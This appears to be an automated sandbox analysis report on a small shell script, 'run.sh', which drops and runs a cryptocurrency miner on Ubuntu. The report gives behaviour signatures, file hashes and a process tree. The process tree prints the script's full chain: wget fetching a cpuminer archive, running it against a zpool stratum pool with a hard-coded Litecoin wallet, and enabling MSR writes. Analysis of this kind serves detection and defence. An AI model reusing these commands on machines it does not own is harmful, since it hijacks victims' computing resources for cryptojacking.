Resubmissions
26-06-2024 08:35
240626-khaacsyckr 726-06-2024 08:35
240626-kgz5dswakb 726-06-2024 08:34
240626-kgw3qsycjk 726-06-2024 08:34
240626-kgtbvawajc 726-06-2024 08:34
240626-kglxrsybqp 726-06-2024 08:34
240626-kgfqravhqf 726-06-2024 08:33
240626-kgavhavhpg 726-06-2024 08:33
240626-kf3twsybnl 726-06-2024 08:32
240626-kfpl9svhme 726-06-2024 08:32
240626-kfcygavhla 7Analysis
-
max time kernel
1798s -
max time network
1800s -
platform
ubuntu-20.04_amd64 -
resource
ubuntu2004-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu2004-amd64-20240611-enkernel:5.4.0-169-genericlocale:en-usos:ubuntu-20.04-amd64system -
submitted
26-06-2024 08:32
Static task
static1
General
-
Target
run.sh
-
Size
404B
-
MD5
c3ab72c96f79d89cf768144d9d98070f
-
SHA1
ff6426eac260f84825fdc938afdb2302734ed754
-
SHA256
cc6ed95cfdf33fc88e8a1de7dc8b1ecadd1af196e5e9d26f0b277deada2b01c4
-
SHA512
98a9b5dd77ddba6975426e2c13d97850a8eb4f2e3b95e53cb35fe64ed69caf75ca18b31592fc8e4c84efa16653764ca902f7c301fe58613272c82ed969e45802
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
Processes:
cpuminer-sse42-aesioc pid process /tmp/cpuminer-sse42-aes 1431 cpuminer-sse42-aes -
Processes:
resource yara_rule /tmp/cpuminer-avx upx /tmp/cpuminer-avx2 upx /tmp/cpuminer-avx512 upx /tmp/cpuminer-avx512-sha-vaes upx /tmp/cpuminer-ryzen upx /tmp/cpuminer-sse2 upx /tmp/cpuminer-sse2amd upx /tmp/cpuminer-sse42 upx /tmp/cpuminer-sse42-aes upx -
Checks hardware identifiers (DMI) 1 TTPs 4 IoCs
Checks DMI information which indicate if the system is a virtual machine.
Processes:
cpuminer-sse42-aesdescription ioc process File opened for reading /sys/devices/virtual/dmi/id/board_vendor cpuminer-sse42-aes File opened for reading /sys/devices/virtual/dmi/id/bios_vendor cpuminer-sse42-aes File opened for reading /sys/devices/virtual/dmi/id/sys_vendor cpuminer-sse42-aes File opened for reading /sys/devices/virtual/dmi/id/product_name cpuminer-sse42-aes -
Reads MAC address of network interface 2 TTPs 1 IoCs
Fetches the MAC address of active network interfaces. May be used to detect known values for hypervisors.
Processes:
cpuminer-sse42-aesdescription ioc process File opened for reading /sys/class/net/ens3/address cpuminer-sse42-aes -
Reads hardware information 1 TTPs 14 IoCs
Accesses system info like serial numbers, manufacturer names etc.
Processes:
cpuminer-sse42-aesdescription ioc process File opened for reading /sys/devices/virtual/dmi/id/board_asset_tag cpuminer-sse42-aes File opened for reading /sys/devices/virtual/dmi/id/board_version cpuminer-sse42-aes File opened for reading /sys/devices/virtual/dmi/id/board_serial cpuminer-sse42-aes File opened for reading /sys/devices/virtual/dmi/id/chassis_version cpuminer-sse42-aes File opened for reading /sys/devices/virtual/dmi/id/chassis_serial cpuminer-sse42-aes File opened for reading /sys/devices/virtual/dmi/id/bios_version cpuminer-sse42-aes File opened for reading /sys/devices/virtual/dmi/id/bios_date cpuminer-sse42-aes File opened for reading /sys/devices/virtual/dmi/id/product_version cpuminer-sse42-aes File opened for reading /sys/devices/virtual/dmi/id/product_uuid cpuminer-sse42-aes File opened for reading /sys/devices/virtual/dmi/id/board_name cpuminer-sse42-aes File opened for reading /sys/devices/virtual/dmi/id/chassis_vendor cpuminer-sse42-aes File opened for reading /sys/devices/virtual/dmi/id/product_serial cpuminer-sse42-aes File opened for reading /sys/devices/virtual/dmi/id/chassis_type cpuminer-sse42-aes File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag cpuminer-sse42-aes -
Checks CPU configuration 1 TTPs 1 IoCs
Checks CPU information which indicate if the system is a virtual machine.
Processes:
cpuminer-sse42-aesdescription ioc process File opened for reading /proc/cpuinfo cpuminer-sse42-aes -
Reads CPU attributes 1 TTPs 3 IoCs
Processes:
cpuminer-sse42-aesdescription ioc process File opened for reading /sys/devices/system/cpu/possible cpuminer-sse42-aes File opened for reading /sys/devices/system/cpu/online cpuminer-sse42-aes File opened for reading /sys/devices/system/cpu/cpu0/cpufreq/scaling_cur_freq cpuminer-sse42-aes -
Enumerates kernel/hardware configuration 1 TTPs 64 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
Processes:
cpuminer-sse42-aesmodprobedescription ioc process File opened for reading /sys/fs/cgroup/cpuset/cpuset.mems cpuminer-sse42-aes File opened for reading /sys/class/block/sr0/dev cpuminer-sse42-aes File opened for reading /sys/class/ve cpuminer-sse42-aes File opened for reading /sys/fs/cgroup/unified/cgroup.controllers cpuminer-sse42-aes File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/id cpuminer-sse42-aes File opened for reading /sys/class/block/fd0/device/numa_node cpuminer-sse42-aes File opened for reading /sys/bus/node/devices/node0/hugepages/hugepages-2048kB/nr_hugepages cpuminer-sse42-aes File opened for reading /sys/bus/node/devices/node0/access0/initiators/read_latency cpuminer-sse42-aes File opened for reading /sys/bus/node/devices/node0/access0/initiators/write_latency cpuminer-sse42-aes File opened for reading /sys/class/hwmon/hwmon2/temp1_input cpuminer-sse42-aes File opened for reading /sys/module/msr/initstate modprobe File opened for reading /sys/fs/cgroup/cpuset/cpuset.cpus cpuminer-sse42-aes File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/shared_cpu_map cpuminer-sse42-aes File opened for reading /sys/class/block/vda/device/devtype cpuminer-sse42-aes File opened for reading /sys/devices/system/node/node0/cpumap cpuminer-sse42-aes File opened for reading /sys/devices/system/node/node0/hugepages/hugepages-2048kB/free_hugepages cpuminer-sse42-aes File opened for reading /sys/class/block/fd0/queue/hw_sector_size cpuminer-sse42-aes File opened for reading /sys/class/block/fd0/device/devtype cpuminer-sse42-aes File opened for reading /sys/class/net cpuminer-sse42-aes File opened for reading /sys/devices/system/node cpuminer-sse42-aes File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/coherency_line_size cpuminer-sse42-aes File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/number_of_sets cpuminer-sse42-aes File opened for reading /sys/bus/cpu/devices/cpu0/cache/index5/shared_cpu_map cpuminer-sse42-aes File opened for reading /sys/bus/cpu/devices/cpu0/cpu_capacity cpuminer-sse42-aes File opened for reading /sys/bus/cpu/devices/cpu0/cache/index7/shared_cpu_map cpuminer-sse42-aes File opened for reading /sys/kernel/mm/hugepages cpuminer-sse42-aes File opened for reading /sys/bus/cpu/devices/cpu0/topology/core_id cpuminer-sse42-aes File opened for reading /sys/bus/cpu/devices/cpu0/cache/index1/id cpuminer-sse42-aes File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/level cpuminer-sse42-aes File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/size cpuminer-sse42-aes File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/coherency_line_size cpuminer-sse42-aes File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/id cpuminer-sse42-aes File opened for reading /sys/bus/node/devices/node0/access0/initiators/write_bandwidth cpuminer-sse42-aes File opened for reading /sys/class/hwmon/hwmon0/temp1_input cpuminer-sse42-aes File opened for reading /sys/devices/system/node/node0/meminfo cpuminer-sse42-aes File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/number_of_sets cpuminer-sse42-aes File opened for reading /sys/bus/cpu/devices/cpu0/cache/index6/shared_cpu_map cpuminer-sse42-aes File opened for reading /sys/bus/cpu/devices/cpu0/cpufreq/cpuinfo_max_freq cpuminer-sse42-aes File opened for reading /sys/bus/node/devices/node0/access0/initiators cpuminer-sse42-aes File opened for reading /sys/class/block cpuminer-sse42-aes File opened for reading /sys/bus/pci/devices/0000:00:04.0/local_cpus cpuminer-sse42-aes File opened for reading /sys/class/block/sr0/device/devtype cpuminer-sse42-aes File opened for reading /sys/bus/cpu/devices/cpu0/cache/index1/level cpuminer-sse42-aes File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/shared_cpu_map cpuminer-sse42-aes File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/level cpuminer-sse42-aes File opened for reading /sys/bus/cpu/devices/cpu0/cache/index8/shared_cpu_map cpuminer-sse42-aes File opened for reading /sys/bus/node/devices/node0/access1/initiators cpuminer-sse42-aes File opened for reading /sys/class/block/vda/queue/hw_sector_size cpuminer-sse42-aes File opened for reading /sys/bus/cpu/devices/cpu0/topology/package_cpus cpuminer-sse42-aes File opened for reading /sys/bus/cpu/devices/cpu0/cache/index9/shared_cpu_map cpuminer-sse42-aes File opened for reading /sys/bus/dax/devices cpuminer-sse42-aes File opened for reading /sys/devices/platform/coretemp.0/hwmon/hwmon3/temp1_input cpuminer-sse42-aes File opened for reading /sys/bus/cpu/devices/cpu0/topology/cluster_cpus cpuminer-sse42-aes File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/type cpuminer-sse42-aes File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/size cpuminer-sse42-aes File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/physical_line_partition cpuminer-sse42-aes File opened for reading /sys/bus/node/devices/node0/hugepages cpuminer-sse42-aes File opened for reading /sys/bus/node/devices/node0/cpumap cpuminer-sse42-aes File opened for reading /sys/class/block/vda/size cpuminer-sse42-aes File opened for reading /sys/class/bxi cpuminer-sse42-aes File opened for reading /sys/bus/cpu/devices/cpu0/topology/core_cpus cpuminer-sse42-aes File opened for reading /sys/bus/cpu/devices/cpu0/topology/die_cpus cpuminer-sse42-aes File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/id cpuminer-sse42-aes File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/coherency_line_size cpuminer-sse42-aes -
Reads runtime system information 9 IoCs
Reads data from /proc virtual filesystem.
Processes:
tarcpuminer-sse42-aesmodprobedescription ioc process File opened for reading /proc/filesystems tar File opened for reading /proc/sys/kernel/random/boot_id tar File opened for reading /proc/self/exe cpuminer-sse42-aes File opened for reading /proc/self/status cpuminer-sse42-aes File opened for reading /proc/self/cpuset cpuminer-sse42-aes File opened for reading /proc/driver/nvidia/gpus cpuminer-sse42-aes File opened for reading /proc/cmdline modprobe File opened for reading /proc/mounts cpuminer-sse42-aes File opened for reading /proc/meminfo cpuminer-sse42-aes -
Writes file to tmp directory 17 IoCs
Malware often drops required files in the /tmp directory.
Processes:
tarwgetdescription ioc process File opened for modification /tmp/cpuminer-avx2 tar File opened for modification /tmp/cpuminer-ryzen tar File opened for modification /tmp/cpuminer-sse2 tar File opened for modification /tmp/cpuminer-sse42 tar File opened for modification /tmp/miner-raptoreum.sh tar File opened for modification /tmp/miner-tidecoin.sh tar File opened for modification /tmp/cpuminer-avx512 tar File opened for modification /tmp/cpuminer-sse2amd tar File opened for modification /tmp/cpuminer-sse42-aes tar File opened for modification /tmp/miner-avian-minotaurx.sh tar File opened for modification /tmp/cpuminer-avx512-sha-vaes tar File opened for modification /tmp/miner-dpowcoin.sh tar File opened for modification /tmp/miner-goldcash.sh tar File opened for modification /tmp/miner-sugar.sh tar File opened for modification /tmp/miner-yenten.sh tar File opened for modification /tmp/cpuminer.tar.gz wget File opened for modification /tmp/cpuminer-avx tar
Processes
-
/tmp/run.sh/tmp/run.sh1⤵PID:1386
-
/usr/bin/wgetwget -O cpuminer.tar.gz https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.40/cpuminer-opt-linux-5.0.40.tar.gz2⤵
- Writes file to tmp directory
PID:1387
-
-
/usr/bin/tartar -xf cpuminer.tar.gz2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1427 -
/usr/local/sbin/gzipgzip -d3⤵PID:1428
-
-
/usr/local/bin/gzipgzip -d3⤵PID:1428
-
-
/usr/sbin/gzipgzip -d3⤵PID:1428
-
-
/usr/bin/gzipgzip -d3⤵PID:1428
-
-
-
/usr/bin/chmodchmod +x cpuminer-sse42-aes2⤵PID:1429
-
-
/usr/bin/nprocnproc2⤵PID:1430
-
-
/tmp/cpuminer-sse42-aes./cpuminer-sse42-aes -a minotaurx -o stratum+tcp://minotaurx.eu.mine.zpool.ca:7019 "--userpass=ltc1qy2q2xjukf5kfarw3fskvdr9e3d003l9wp6peve:c=LTC" "--threads=1"2⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads MAC address of network interface
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:1431 -
/bin/shsh -c -- "/sbin/modprobe msr allow_writes=on > /dev/null 2>&1"3⤵PID:1432
-
/sbin/modprobe/sbin/modprobe msr "allow_writes=on"4⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:1433
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
165B
MD544eebcc6ac4a74c1d9dec143480d0b53
SHA1a70c0844611c8821c8ae136f3cf9ff9e80b33e4d
SHA25627eaaad8337984278aa6d9b4c1ebd7faa0f1716b18fa95327b9f3aaf86794ac5
SHA512b3af8449b95a8bf748b71662ffab3a4fe53b7fcb143be6932f0a57a970ad1e5d4a70c7c83ff61ff0bb5dcb010d35a916b617f982de13208162308cff6b1e579b
-
Filesize
3.1MB
MD522b710780b2ef92b5e4badfcb3e161ab
SHA1634d032a2024abde8aaecdb3c02d64dccdabd08d
SHA256e3a39579707a0844aa1b90210786fc6893541f65cb8144d573386b54395ce7de
SHA512971072d579d09179bd4823ad80d68db43648d6b9d36dd3b1064a895c0921ede9abbf47874db587108d1794941fec036d72c527158b1e4e7b7847611a94e11801
-
Filesize
3.4MB
MD549fb54a04c596c9be79c122955b946eb
SHA18f9e75ae090676f10079153401ab14fac5359ade
SHA256afed09f7e34012dd802c48ebef29b0ac3d32a940ee692ed3c6be10665d5f8124
SHA5120b6ee36a56d27fa85630fc51ee36607de5f90b18c04be57d0a42cdab3a87c12994ebbeab5574c6d95faff6a229314e887b7653cb3f8f38e959576810d04afee9
-
Filesize
3.5MB
MD5f68d951913f722b5cd9e4dd230bee7e3
SHA1ac23aa5b5fb908834fb6dd47729881fd2f712dfc
SHA256d0079a9a7a397a00101f0a061f86bbb7e94179a4c57ac3b2253374d5e515ed08
SHA512b0010c8fe75027f2522097d03a6cebe55586aa0e87eae991fba44bd26e2de32a5a9093e5e367b4d34d9e928d693b4aff9ff5abc232a941b4015fdcfdd16926b2
-
Filesize
3.6MB
MD5bca6f4a0b53755cc6a57fa796af8f277
SHA12bf4f123672c67608374e34cd809c6a34d963b4d
SHA256911628557c610e74d32d07dfb67152a06b43ca7a1ee9258fd1b0ca979595024e
SHA51265d28dd2a4c7216313eaf032773f20a1946c1068b670dcac5ba288c9ce75ec59284e50d5a7604f249b0be694827db01e27b590667033fe245eee8726d4627b0a
-
Filesize
3.4MB
MD597976f553e9a513f167c51903aa88e9e
SHA1b64fcd3d617d460f668517458da4f2d56586e10a
SHA256b7229f8043e1af5acbd66257038ace2869aff711d81b2e726a64ae06cca70784
SHA51225b2c11e8a4e8342247a776694f8583393cc9578b5e487c009e3a571d36a92dea55cb8104c4c4544fd4e2e91b049b7a7d30fd94d22e88e7f24736297753899ac
-
Filesize
3.1MB
MD5406a6480aee5192d0df7ea213bd97264
SHA1205997278383b6a685beb150f08955ac9c39b332
SHA256da30c7a8acaa9ac8e625728c4a918831ce436c38cdfa0cb4fccedad73fc0ecaa
SHA5123b75f9c5e5e4852c9aefec19dabd77f859db7bc9bf50c29ce207ac57a8433823d158f574ea288c03cb008745c5e7c4c4c5957734f2b10ea3f27bf59897af3f61
-
Filesize
3.1MB
MD5ae28a68d7c9442fd654cc81fabead08f
SHA136c2619a5f284cb3b40be7b2a04845a120ba833f
SHA256b708d91dfada0a8476d32c89e4756e9b0f3c167cf264b6698b04de26baed5663
SHA512dacde703179a11f3507e61908fb6a0c153b8be630faa236b783e1a88d35773c2d3054efd2037a0389ed75b8105d2990d002dd3e583a9abc4498f9de833494816
-
Filesize
3.2MB
MD50c2bc62dd97fd328555cfc2a81085214
SHA1186dffb77a888d04170d76b444cdc8c2f69ba664
SHA256a06de9c1a1194a4cb1ec231361c4e27189d7c021411922dc5b2669ebd66ff156
SHA5121a3cba890d19a7e739b08114781e543263ce1cb7ecfbb6453f7bee3812e32a6dc5faebc6886b52e6022cd55b56d24e518d44b0d7693bdff21ca25bfbe6ea32e1
-
Filesize
3.1MB
MD529dd40e20275ab6f62d35facc93db6d9
SHA1442bfc07c0fe5be5b6d427b7073fb1684aa94571
SHA256eba794d5948f1bc8fadd7b0ff3d8aebfa3902011737d13fba62338d91b5fbfff
SHA5126c8b4c1079a39ab519209bf14ea8e3b770b4b3d4c1ac0bfa1a4b78aa3a91e66d8838d2a9bf72176e5fdae0f7d8639db7de0b0cd11a799ba428128dcb1edb3d3f
-
Filesize
28.9MB
MD5e9312b85e3bd6db840bc358668a7f37e
SHA1e4f483655509a895d93ff23678053fa1825e2d7d
SHA2561c87158ee3ae452a4d78cf4749953a0bdb9532113379f0484b65daf215f4cb7a
SHA512666aa7237db6c450c79db169ebb10ac29396d31ecc58070b9c2150bf2f0d79d8115b15dc9d7edb91ba72d8305d2bd4d8e4144fd72b93b603d678f7e5be94e9cd
-
Filesize
376B
MD584caf2054bbae6b60875e06310299378
SHA11b0ef23e1c61e67322a36b935150e4809235d1db
SHA256d9cfb46648a5bf259dec1a91996ac1530e09d01341d05d343de18892f5691d7b
SHA51208625fb771a1590226a061b3d394191a8a089fd7c2ccd65ecadbbdb11316bb041470d0fd0f01f370a40aa0df5e2de3f412d026ee179af4bf83dfd3e4af2042f1
-
Filesize
381B
MD548f2ad9e9d73a2a61de256163b0a90ef
SHA11807209e3d02f6bcf50919549a73f35ad2b65e97
SHA25606687d58e56fb8ea72285bb99cac60ad9186239fa3d95c1e943a65f691d2319d
SHA5124ebaee9fa6a88f6982acefef670edc5b963197ad7448b1b23aefbc89fdd0fa96568a6efee248ae3fe96962075417ea6f765ab5116b2613eb22ad6fa9c66b7468
-
Filesize
385B
MD5a6ce27365dfe4ec79dc59240de8860be
SHA1822c20040f7a27b9604b205d7593741490fe96cb
SHA25622b8949e17458b0472bd1b7ab9e683f28b7ccc3f884e30cc1367e6b2b1192c26
SHA51268dc463b782f4799388ebe9c4464a74990829aea0b17d2e40590d4f7552c4a7baefb8a89071f0fcdc35a23d0003e47653a15beca870854f4a4e5c983d74e7c54
-
Filesize
215B
MD5accff0162caa25fdce0857df48a8c463
SHA121670cbedd0ac120fc8abaaad51de91336fa8c91
SHA256c8b33d6dd9832d5a4302c5e3cfe1db7c67a96ee02f9faea7ff783b6a4bee3bea
SHA512278b60ca4f48a7873dc2c72b332fcaa8df2702e4c649c14f3b2d37fd1f554029be6776d7739e0313347407933b26cd2fe9b6479adf59059bfeb99a5b638de130
-
Filesize
380B
MD5773663b4e2c8232c707082bddf6db8c2
SHA1298469b7cd0f3ac7aa2d5d8320ce17bd3b8a3185
SHA2561bae4c98c1923ace1c7de0454a410c61dc8d075870fdfad267b1371f55f235a3
SHA512606c5394d9e04023f3c150f6c0e04762834b03e2c5c0ddd68f83e4f87e582890d37c3aced5ea65061c554d6ae210127f9b9e264fad4ee56827abec3615681c54
-
Filesize
379B
MD5f256a2a753463a47ca4f35ad489f17b6
SHA16cf7d81bde46c796f9c945ce1bd8991343612fe4
SHA256ab34e30993fea54efc5bdbaacc72ed9e33934523e5802c5b9ecd4ebf19517569
SHA5123fe6571ed080b6d7e398ee0c6e11b421eca76ca5695dcf1e41656848344f8648138b731b23d6e820680213817c21df5e1f7cb2e6162a98db7d800e936fd45d9e
-
Filesize
385B
MD5e0f70b83ce5814641c2d18ef9d92629d
SHA1ee722fe50ef924ac2da57e4854c6d63152b548ae
SHA2567259bd2d5392578457b4b83081af03bb25cb9afe62a6f5a2ca795052de5b4ab4
SHA51283f6efa1f9200d83476cb572c56aa54c36e907f24a41c2c530cfdb51c87420b98a94712cbb2797e03a584d4f7eb88871f6827249edbc506eecc3e6fb083c5f33